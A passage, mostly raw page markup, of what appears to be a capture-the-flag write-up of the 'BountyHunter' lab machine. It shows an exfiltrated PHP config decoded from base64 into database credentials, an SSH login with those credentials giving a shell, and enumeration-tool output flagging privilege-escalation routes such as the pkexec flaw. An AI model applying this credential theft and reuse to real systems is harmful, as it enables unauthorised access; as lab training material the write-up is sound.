data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f1182e9d-8736-45c9-a509-183017d66c14_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:63157,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192933060?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1182e9d-8736-45c9-a509-183017d66c14_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!vuoF!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1182e9d-8736-45c9-a509-183017d66c14_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!vuoF!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1182e9d-8736-45c9-a509-183017d66c14_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!vuoF!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1182e9d-8736-45c9-a509-183017d66c14_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!vuoF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff1182e9d-8736-45c9-a509-183017d66c14_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Now our Payload is shifted to:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!n8KB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58d2d553-d95a-4669-a131-21d5300b7fad_1231x674.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!n8KB!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58d2d553-d95a-4669-a131-21d5300b7fad_1231x674.png 424w, https://substackcdn.com/image/fetch/$s_!n8KB!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58d2d553-d95a-4669-a131-21d5300b7fad_1231x674.png 848w, https://substackcdn.com/image/fetch/$s_!n8KB!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58d2d553-d95a-4669-a131-21d5300b7fad_1231x674.png 1272w, https://substackcdn.com/image/fetch/$s_!n8KB!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58d2d553-d95a-4669-a131-21d5300b7fad_1231x674.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!n8KB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58d2d553-d95a-4669-a131-21d5300b7fad_1231x674.png" width="1231" height="674" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/58d2d553-d95a-4669-a131-21d5300b7fad_1231x674.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:674,&quot;width&quot;:1231,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:54634,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192933060?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F700575ed-6519-4a43-ad71-131934e9e22d_1231x743.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!n8KB!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58d2d553-d95a-4669-a131-21d5300b7fad_1231x674.png 424w, https://substackcdn.com/image/fetch/$s_!n8KB!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58d2d553-d95a-4669-a131-21d5300b7fad_1231x674.png 848w, https://substackcdn.com/image/fetch/$s_!n8KB!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58d2d553-d95a-4669-a131-21d5300b7fad_1231x674.png 1272w, https://substackcdn.com/image/fetch/$s_!n8KB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58d2d553-d95a-4669-a131-21d5300b7fad_1231x674.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>And we try it again on Burp:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!tWbS!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F67eb92d8-b4ab-47f1-b540-ed9b5093a926_1584x900.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!tWbS!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F67eb92d8-b4ab-47f1-b540-ed9b5093a926_1584x900.png 424w, https://substackcdn.com/image/fetch/$s_!tWbS!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F67eb92d8-b4ab-47f1-b540-ed9b5093a926_1584x900.png 848w, https://substackcdn.com/image/fetch/$s_!tWbS!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F67eb92d8-b4ab-47f1-b540-ed9b5093a926_1584x900.png 1272w, https://substackcdn.com/image/fetch/$s_!tWbS!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F67eb92d8-b4ab-47f1-b540-ed9b5093a926_1584x900.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!tWbS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F67eb92d8-b4ab-47f1-b540-ed9b5093a926_1584x900.png" width="1456" height="827" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/67eb92d8-b4ab-47f1-b540-ed9b5093a926_1584x900.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:827,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:210576,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192933060?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F67eb92d8-b4ab-47f1-b540-ed9b5093a926_1584x900.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!tWbS!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F67eb92d8-b4ab-47f1-b540-ed9b5093a926_1584x900.png 424w, https://substackcdn.com/image/fetch/$s_!tWbS!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F67eb92d8-b4ab-47f1-b540-ed9b5093a926_1584x900.png 848w, https://substackcdn.com/image/fetch/$s_!tWbS!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F67eb92d8-b4ab-47f1-b540-ed9b5093a926_1584x900.png 1272w, https://substackcdn.com/image/fetch/$s_!tWbS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F67eb92d8-b4ab-47f1-b540-ed9b5093a926_1584x900.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Perfect, we got our encoded content inside, let&#8217;s decoded it:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;php&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-php">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ echo "PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo=" | base64 -d
&lt;?php
// TODO -&gt; Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?&gt;</code></pre></div><p>And based on the /etc/passwd we can try several users, and finally found a match of:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ssh 10.129.95.166 -u development -p m19RoAU0hP41A1sTsq6K
SSH         10.129.95.166   22     10.129.95.166    [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.2
SSH         10.129.95.166   22     10.129.95.166    [+] development:m19RoAU0hP41A1sTsq6K (Pwn3d!) Linux - Shell access!</code></pre></div><p>And we found a pair:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">user: development
passwd: m19RoAU0hP41A1sTsq6K</code></pre></div><p>Btw! we got credentials. . .</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Rqop!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8cd5f358-4ce6-439f-93e9-0aca78136bbc_665x425.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Rqop!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8cd5f358-4ce6-439f-93e9-0aca78136bbc_665x425.png 424w, https://substackcdn.com/image/fetch/$s_!Rqop!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8cd5f358-4ce6-439f-93e9-0aca78136bbc_665x425.png 848w, https://substackcdn.com/image/fetch/$s_!Rqop!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8cd5f358-4ce6-439f-93e9-0aca78136bbc_665x425.png 1272w, https://substackcdn.com/image/fetch/$s_!Rqop!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8cd5f358-4ce6-439f-93e9-0aca78136bbc_665x425.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Rqop!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8cd5f358-4ce6-439f-93e9-0aca78136bbc_665x425.png" width="665" height="425" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8cd5f358-4ce6-439f-93e9-0aca78136bbc_665x425.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:425,&quot;width&quot;:665,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:518296,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192933060?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8cd5f358-4ce6-439f-93e9-0aca78136bbc_665x425.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Rqop!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8cd5f358-4ce6-439f-93e9-0aca78136bbc_665x425.png 424w, https://substackcdn.com/image/fetch/$s_!Rqop!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8cd5f358-4ce6-439f-93e9-0aca78136bbc_665x425.png 848w, https://substackcdn.com/image/fetch/$s_!Rqop!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8cd5f358-4ce6-439f-93e9-0aca78136bbc_665x425.png 1272w, https://substackcdn.com/image/fetch/$s_!Rqop!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8cd5f358-4ce6-439f-93e9-0aca78136bbc_665x425.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Let&#8217;s BloodPengu.</p><ol start="5"><li><p><em>BloodPengu Attack Paths</em></p></li></ol><p>With credentials let&#8217;s use BloodPengu-Python:</p><ul><li><p>Collect All</p></li><li><p>Collect Kernel and LPE</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(root&#12927;kali)-[/]
&#9492;&#9472;# bloodpengu-python 10.129.95.166 -u development -p m19RoAU0hP41A1sTsq6K -o out.json

         _  __        ___  __             _____                                
   ___ _| |/_/_______/ _ )/ /__  ___  ___/ / _ \___ ___  ___ ___ __  ___  __ __
  / _ `/&gt;  &lt;/ __/___/ _  / / _ \/ _ \/ _  / ___/ -_) _ \/ _ `/ // / / _ \/ // /
  \_, /_/|_|\__/   /____/_/\___/\___/\_,_/_/   \__/_//_/\_, /\_,_(_) .__/\_, / 
 /___/                                                 /___/      /_/   /___/  

                           v1.5.8 [SuSHi Rav3n]                          

  gxc-BloodPengu.py v1.5.8 | by &lt;@byt3n33dl3&gt;
  Data collector in Python for BloodPengu APM

  ----------------------------------------------------------------------

  [*]  Target  : 10.129.95.166:22
  [*]  User    : development
  [*]  Auth    : password
  [*]  Mode    : full collection
  [*]  Output  : out.json

  [*]  Connecting to 10.129.95.166:22...
  [+]  Connected in 1.85s  -  development@10.129.95.166:22
  [+]  Remote  : Linux bountyhunter 5.4.0-80-generic #90-Ubuntu SMP Fri Jul 9 22:49:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

  ----------------------------------------------------------------------

  [*]  Collecting users and groups...
. . .[SNIP]. . .
  [POTENTIAL]  10

  [~]  Total findings  :  67
  [~]  Graph nodes     :  319
  [~]  Graph edges     :  97
  [~]  Output file     :  out.json

  [+]  Import out.json into BloodPengu via Import JSON

  ----------------------------------------------------------------------

  gxc-BloodPengu.py v1.5.8 by &lt;@byt3n33dl3&gt; &lt;github.com/byt3n33dl3/gxc-BloodPengu.py&gt;</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(root&#12927;kali)-[/]
&#9492;&#9472;# bloodpengu-python 10.129.95.166 -u development -p m19RoAU0hP41A1sTsq6K -M kernel -o kernel_out.json 

         _  __        ___  __             _____                                
   ___ _| |/_/_______/ _ )/ /__  ___  ___/ / _ \___ ___  ___ ___ __  ___  __ __
  / _ `/&gt;  &lt;/ __/___/ _  / / _ \/ _ \/ _  / ___/ -_) _ \/ _ `/ // / / _ \/ // /
  \_, /_/|_|\__/   /____/_/\___/\___/\_,_/_/   \__/_//_/\_, /\_,_(_) .__/\_, / 
 /___/                                                 /___/      /_/   /___/  

                           v1.5.8 [SuSHi Rav3n]                          

  gxc-BloodPengu.py v1.5.8 | by &lt;@byt3n33dl3&gt;
  Data collector in Python for BloodPengu APM

  ----------------------------------------------------------------------

  [*]  Target  : 10.129.95.166:22
  [*]  User    : development
  [*]  Auth    : password
  [*]  Mode    : kernel
  [*]  Output  : kernel_out.json

  [*]  Connecting to 10.129.95.166:22...
  [+]  Connected in 1.89s  -  development@10.129.95.166:22
  [+]  Remote  : Linux bountyhunter 5.4.0-80-generic #90-Ubuntu SMP Fri Jul 9 22:49:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

  ----------------------------------------------------------------------

  [*]  Collecting users and groups...
  [+]  Users: 34  |  Groups: 60
  [*]  Collecting privileged group memberships...
  [+]  Groups: development
  [*]  Running kernel and LPE full checklist...
  [HIGH    ]  kernel          CVE-2021-4034  |  Polkit pkexec privilege escalation  |  kernel 5.4.0-80-generic
. . .[SNIP]. . .
  [HIGH     ]  13
  [POTENTIAL]  6

  [~]  Total findings  :  23
  [~]  Graph nodes     :  94
  [~]  Graph edges     :  10
  [~]  Output file     :  kernel_out.json

  [+]  Import kernel_out.json into BloodPengu via Import JSON

  ----------------------------------------------------------------------

  gxc-BloodPengu.py v1.5.8 by &lt;@byt3n33dl3&gt; &lt;github.com/byt3n33dl3/gxc-BloodPengu.py&gt;</code></pre></div><p>We have several:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!FjBq!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F534431de-109e-4352-a188-5478b016f18f_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!FjBq!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F534431de-109e-4352-a188-5478b016f18f_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!FjBq!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F534431de-109e-4352-a188-5478b016f18f_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!FjBq!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F534431de-109e-4352-a188-5478b016f18f_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!FjBq!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F534431de-109e-4352-a188-5478b016f18f_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!FjBq!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F534431de-109e-4352-a188-5478b016f18f_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/534431de-109e-4352-a188-5478b016f18f_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:527817,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192933060?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F534431de-109e-4352-a188-5478b016f18f_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!FjBq!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F534431de-109e-4352-a188-5478b016f18f_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!FjBq!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F534431de-109e-4352-a188-5478b016f18f_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!FjBq!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F534431de-109e-4352-a188-5478b016f18f_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!FjBq!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F534431de-109e-4352-a188-5478b016f18f_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" 